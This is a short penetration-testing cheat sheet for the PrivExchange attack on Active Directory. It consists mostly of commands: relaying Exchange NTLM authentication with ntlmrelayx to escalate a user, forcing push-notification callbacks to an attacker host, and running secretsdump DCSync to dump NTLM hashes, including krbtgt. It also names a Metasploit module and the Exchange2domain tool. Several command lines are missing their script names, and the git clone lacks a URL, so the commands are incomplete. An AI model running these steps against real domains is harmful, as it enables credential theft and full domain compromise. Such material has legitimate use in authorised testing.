PEnTest – PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange.
⚠ You need a shell on a user account with a mailbox.

  1. Identify the Exchange server hostname or IP address
    pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
  2. Relay the Exchange server authentication and escalate privileges (using ntlmrelayx from Impacket)
    -t ldap://dc01.domain.local --escalate-user username
  3. Subscribe to the push notification feature (using or powerPriv); this uses the credentials of the current user to authenticate to the Exchange server, forcing the Exchange server to send its NTLMv2 hash back to a controlled machine.
    python -ah xxxxxxx -u xxxx -d xxxxx
    python -ah mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
    powerPriv -targetHost corpExch01 -attackerHost -Version 2016
  4. Profit using secretsdump from Impacket: the user can now perform a DCSync and get another user's NTLM hash
    python xxxxxxxxxx -just-dc
    python lab/buff@ -ntds ntds -history -just-dc-ntlm
  5. Clean your mess and restore the previous state of the user's ACL
    python --restore ../aclpwn-20190319-125741.restore

Alternatively you can use the Metasploit module

use auxiliary/scanner/http/exchange_web_server_pushsubscription

Alternatively you can use an all-in-one tool: Exchange2domain.

git clone 
python -ah attackterip -ap listenport -u user -p password -d -th DCip MailServerip
python -ah attackterip -u user -p password -d -th DCip --just-dc-user krbtgt MailServerip